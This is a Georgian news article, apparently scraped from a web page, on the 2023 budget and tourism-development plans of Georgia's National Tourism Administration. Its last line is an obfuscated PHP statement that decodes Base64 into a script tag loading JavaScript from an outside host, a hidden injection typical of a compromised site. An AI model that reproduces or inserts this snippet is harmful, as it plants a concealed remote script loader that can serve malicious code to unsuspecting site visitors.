celsiusi
ავერსი საქკაბელი

საქართველოს ტურიზმის ეროვნული ადმინისტრაციის 2023 წელს ბიუჯეტი 36 მლნ ლარით განისაზღვრა, აქედან კი 2 მილიონ ლარამდე შრომის ანაზღაურებაზე დაიხარჯება.

სახელმწიფო ბიუჯეტის თანახმად, ტურიზმის ადმინისტრაციაში თანამშრომელთა რიცხოვნობა სამოცადასამით არის განსაზღვრული.
ფინანსური დოკუმენტის თანახმად, საქართველოს ტურისტული პოტენციალის ათვისებისთვის დაგეგმილია შემდეგი ნაბიჯების გადადგმა:
1. განხორციელდება სამიზნე ქვეყნების დივერსიფიცირება, რაც გულისხმობს მეზობელი ქვეყნების საბაზრო წილის 70%-მდე შემცირებას და ევროკავშირისა და შორეული ქვეყნების (ჩინეთი, აშშ და სხვა) ბაზრების საბაზრო წილის 30%-მდე გაზრდას;
2. 2023 წელს საქართველო მასპინძელი ქვეყნის სტატუსით წარდგება მსოფლიოს ყველაზე მასშტაბურ და გავლენიან ტურისტულ გამოფენაზე − ITB Berlin 2023-ზე;
3. სამედიცინო ტურიზმის განვითარებისთვის ქვეყნის მასშტაბით განხორციელდა ბალნეოლოგიური კურორტების იდენტიფიცირება და ამ მიმართულებით საჯარო სამართლის იურიდიულმა პირმა − „აწარმოე საქართველოში“ შეიმუშავა ცალკეული სახელმწიფო პროგრამები სპეციალური დაფინანსების პირობებით. ხელი შეეწყობა აღნიშნული მიმართულების განვითარებას;
4. ტურისტული პოტენციალის მაქსიმალურად ათვისებისთვის მიმდინარე ეტაპზე ხორციელდება კურორტების (წყალტუბო, აბასთუმანი და სხვა) ეტაპობრივი განვითარება;
5. გასტრონომიული ტურიზმის განვითარებისთვის მოხდება რეგიონებისთვის დამახასიათებელი/ავთენტური სამზარეულოს პოპულარიზაცია ქვეყნის წამყვანი შეფმზარეულების, ტუროპერატორებისა და მედიის ჩართულობით;
6. ღვინის ტურიზმის განვითარებისთვის ხორციელდება პროექტი „ღვინის გზა“. პროექტი მოიცავს ქვეყანაში არსებულ ღვინის იმ საოჯახო მარნებსა და საწარმოებს, რომლებიც ღვინის ტურიზმის ფარგლებში მასპინძლობას ეწევიან;
7. მომდევნო 4 წლის განმავლობაში საქართველოში მაღალმხარჯველუნარიანი, საქმიანი მოგზაურების მოზიდვისთვის საქმიანი ტურიზმის განვითარება ერთ-ერთი პრიორიტეტული მიმართულება იქნება;
8. ქვეყანაში არსებული ქართული ხუროთმოძღვრული ძეგლების, ფრესკული მხატვრობისა და სიწმინდეების პოპულარიზაციისთვის დაგეგმილია პილიგრიმული (რელიგიური) ტურიზმის განვითარება.
ქვეყნის მთავარ ფინანსურ დოკუმენტში ასევე ვკითხულობთ, რომ საქართველოს სამთო კურორტების განვითარებისთვის 2020−2024 წლებში სამთო-სათხილამურო კურორტების (გუდაური, ბაკურიანი, გოდერძი, თეთნულდი და ჰაწვალი) განვითარებისთვის დაგეგმილია სათხილამურო ინფრასტრუქტურის განვითარება და ოთხი სეზონის ტურისტული პროდუქტების შექმნა;
ცნობისთვის, სსიპ-ის წლევანდელი დაფინანსება 23 მლნ ლარი იყო.
630
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");